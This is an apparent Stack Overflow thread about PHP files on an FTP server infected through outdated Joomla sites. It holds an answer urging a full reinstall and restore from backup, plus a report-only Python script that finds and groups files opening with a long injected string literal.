user3083462

Virus on FTP Server, PHP

Hello, I need some help and advice. Our FTP server contains a virus. All PHP files are corrupted and have the same code at the beginning. Some old Joomla systems are the reason for that. I have updated the old systems. How can I delete the code string from all files on the FTP server? I bought ClamXav and am now downloading the whole FTP server: over 40000 files and 20 GB. But ClamXav does not find the virus.

Here is an example of a file.

The PHPINFO(); was my part.

Upvotes: 1

Views: 551

Answers (1)

user4278933

I was going to suggest a quick script that will go through all 40,000 files and remove the single string, but after reading elsewhere on Stack Overflow, this is perhaps not recommended. If a rootkit was installed, the attacker is likely to know your server better than you.

Your system has been compromised. What you have found is probably only part of the problem.

You need a fresh install.

You need to build a more secure environment or the same problem will re-occur.

Then you need to restore from backup.

I know - you probably don't want to read the above, but if you don't know how to write a quick script to clean your text files, it's unlikely you have done enough to secure your system. A compromised system is a risk to you, your users, and others on the internet (a hacker could use your machine to launch attacks on others).

Upvotes: 5
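
A report-only scan that follows from the question's description (every PHP file opens with the same injected code), added here as an example and not code from either poster. It assumes the injected block is a `<?php` tag followed directly by one variable assigned a very long single-quoted string; `MIN_LITERAL`, the function names and the sample tree are constructed for illustration. It lists and groups affected files so the compromise can be scoped and a backup checked before it is restored, and it modifies nothing.

```python
import hashlib
import re
import tempfile
from collections import defaultdict
from pathlib import Path

# Assumed shape of the injected block: an opening tag followed directly by one
# variable assigned a very long single-quoted string. The threshold is an assumption.
MIN_LITERAL = 1000
LEAD = re.compile(rb"\A\s*<\?php\s*\$\w+\s*=\s*'((?:[^'\\]|\\.)*)'", re.S)

def leading_literal(path):
    """Return the long string literal a PHP file opens with, or None."""
    with open(path, "rb") as fh:
        head = fh.read(256 * 1024)  # the prefix sits at the very top of the file
    m = LEAD.match(head)
    if m and len(m.group(1)) >= MIN_LITERAL:
        return m.group(1)
    return None

def scan(root):
    """Group suspicious *.php files under root by SHA-256 of their leading literal."""
    groups = defaultdict(list)
    for path in sorted(Path(root).rglob("*.php")):
        literal = leading_literal(path)
        if literal is not None:
            groups[hashlib.sha256(literal).hexdigest()].append(path)
    return dict(groups)

def demo():
    """Build a constructed tree (no real payload) and scan it."""
    blob = "x" * 1500  # constructed stand-in for the injected string
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "sub").mkdir()
        (root / "index.php").write_text(f"<?php $a = '{blob}'; echo 1; ?>")
        (root / "sub" / "lib.php").write_text(f"<?php $b = '{blob}'; function f() {{}}")
        (root / "clean.php").write_text("<?php\n$title = 'Home';\necho $title;\n")
        (root / "notes.txt").write_text(f"<?php $a = '{blob}';")  # not *.php, skipped
        return {h: [p.relative_to(root).as_posix() for p in ps]
                for h, ps in scan(root).items()}

if __name__ == "__main__":
    for digest, files in demo().items():
        print(digest[:12], len(files), "files:", ", ".join(files))
```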
